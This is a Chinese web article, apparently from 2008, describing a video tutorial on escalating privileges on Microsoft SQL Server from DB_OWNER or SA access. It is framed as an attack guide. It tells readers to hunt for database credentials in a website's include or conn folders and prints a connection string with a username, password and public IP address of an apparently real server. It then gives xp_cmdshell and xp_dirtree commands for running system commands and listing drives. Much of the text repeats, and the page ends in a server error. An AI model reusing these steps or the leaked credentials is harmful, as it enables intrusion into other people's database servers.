MSSQL数据库下DB_OWNER OR SA的提权

ZDNet 安全频道频道 更新时间:2008-06-15 作者: 来源:SohuIT

本文关键词:组件 mssql ksmm

  动画性质: 无声演示



  录制工具: 屏幕录象专家



  游戏外挂:



  VIP 会员:



  动画评级:



  动画介绍:这个SQL密码什么的 大多在include目录或者 CONN的目录,自己找找看。



  <%



Set DB = Server.CreateObject("ADODB.Connection")



A = "Provider=SQLOLEDB.1;Password=ksmm000;



Persist Security Info=True;User ID=ksmm;



Initial Catalog=ksmm;



Data Source=localhost"



Db.open A



用户:KSMM



密码:KSM000



IP:211.239.171.68



这个方法只适合 开了SQL外联的



刚才密码错了



exec master..xp_cmdshell ’ver’



XP_CMDSHELL不能实用 大多服务器XP_CMDSHELL不能用 许多人就放弃这一步了



还有就是组件问题,网上不少恢复组件的教程,其实恢复了组件也不一定能用。



下面的思路就是利用XP_DIRTREE来列目录



备份启动项不需要什么组件支持,所以这个方法差不多可以通杀 DB.



exec master..xp_dirtree ’c:’,1,1



列C盘目录   Set DB = Server.CreateObject("ADODB.Connection")



  A = "Provider=SQLOLEDB.1;Password=ksmm000;



  Persist Security Info=True;User ID=ksmm;



  Initial Catalog=ksmm;



  Data Source=localhost"



  Db.open A



  用户:KSMM



  密码:KSM000



  IP:211.239.171.68



  这个方法只适合 开了SQL外联的



  刚才密码错了



  exec master..xp_cmdshell ’ver’



  XP_CMDSHELL不能实用 大多服务器XP_CMDSHELL不能用 许多人就放弃这一步了



  还有就是组件问题,网上不少恢复组件的教程,其实恢复了组件也不一定能用。



  下面的思路就是利用XP_DIRTREE来列目录



  备份启动项不需要什么组件支持,所以这个方法差不多可以通杀 DB.



  exec master..xp_dirtree ’c:’,1,1



  列C盘目录

安全频道 mssql 最新报道

[an error occurred while processing this directive]